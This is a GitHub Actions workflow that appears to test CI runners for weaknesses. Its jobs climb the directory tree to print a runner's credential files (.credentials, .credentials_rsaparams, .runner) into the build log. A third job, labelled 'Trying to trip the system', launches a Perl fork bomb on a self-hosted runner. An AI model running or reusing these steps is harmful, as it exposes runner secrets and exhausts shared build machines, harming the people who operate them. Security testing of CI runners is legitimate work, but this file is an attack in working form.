on:
  push:

  workflow_dispatch:

jobs:
  job1:
    runs-on: self-hosted
    steps:
      - run: |
          echo $PWD
          ls -la
          cd ..
          ls -la

          cd ..
          ls -la
          
          cd ..
          ls -la
          
          echo ".credentials"
          cat .credentials
          
          echo ".credentials_rsaparams"
          cat .credentials_rsaparams
          
          cd ..
          ls -la
      
      - run: git --version
        continue-on-error: true
        
      - run: node --version
        continue-on-error: true
        
      - run: dotnet --version
        continue-on-error: true
        
      - uses: actions/checkout@v3
  
  job2:
    runs-on: ubuntu-latest
    steps:
      - run: |
          echo $PWD
          ls -la
          cd ..
          ls -la

          cd ..
          ls -la
          
          cd ..
          ls -la
          
          echo $PWD
          #echo ".credentials"
          #cat .credentials
          
          #echo ".credentials_rsaparams"
          #cat .credentials_rsaparams
                    
          cd runners/2.305.0/
          ls -la
          echo "--------------------------"
          echo ".credentials"
          cat .credentials
          echo ""
          echo "--------------------------"
          echo ".runner:"
          cat .runner
          
          echo "--------------------------"
          #tree

  job3:
    runs-on: self-hosted
    environment: danger
    needs: job1
    steps:
      - run: |
          echo "Trying to trip the system"
      - run: |
          #$ :(){ :|:& };:
          perl -e "fork while fork" &
      
